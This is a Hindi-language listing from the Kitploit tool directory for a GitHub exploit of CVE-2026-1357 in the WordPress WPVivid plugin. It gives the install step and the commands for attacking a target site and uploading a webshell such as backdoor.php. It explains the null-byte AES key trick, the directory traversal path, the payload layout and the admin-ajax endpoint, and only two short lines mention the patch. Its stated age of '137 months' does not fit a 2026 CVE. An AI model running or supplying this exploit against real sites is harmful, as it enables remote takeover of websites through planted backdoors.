Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Exploit-CVE-2026-1357 — CVE-2026-1357 के लिए एक्सप्लॉइट WordPress WPVivid प्लगइन में, जो क्राफ्टेड AES-एन्क्रिप्टेड पेलोड और डायरेक्टरी ट्रैवर्सल के माध्यम से वेबशेल अपलोड करने के लिए रिमोट कोड एक्ज़ीक्यूशन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

CVE-2026-1357 के लिए एक्सप्लॉइट WordPress WPVivid प्लगइन में, जो क्राफ्टेड AES-एन्क्रिप्टेड पेलोड और डायरेक्टरी ट्रैवर्सल के माध्यम से वेबशेल अपलोड करने के लिए रिमोट कोड एक्ज़ीक्यूशन सक्षम करता है।

रिपॉजिटरी देखें
137 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

निर्भरताएँ स्थापित करें

pip3 install pycryptodome requests

बेसिक एक्सप्लॉइट

python3 wpvivi.py http://target.com

कस्टम वेबशेल

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" तकनीकी व्याख्या: Null Byte Key: जब RSA decrypt विफल होता है, तो false लौटाता है, जिसे phpseclib "\x00\x00\x00" के रूप में मानता है। हम AES-128 ECB कुंजी के रूप में 16 null bytes का उपयोग करते हैं। Directory Traversal: Filename को sanitize नहीं किया जाता, जिससे ../../../../wp-content/uploads/shell.php की अनुमति मिलती है Payload Format:

[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] निष्पादन: POST /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site पर भेजें wpvivid_content = base64(एन्क्रिप्टेड payload) पहचान और शमन:

0.9.124 में पैच किया गया:

  • Check if ($key === false || empty($key)) return false;
  • Extension whitelist: zip,gz,tar,sql
टूल डाउनलोड करें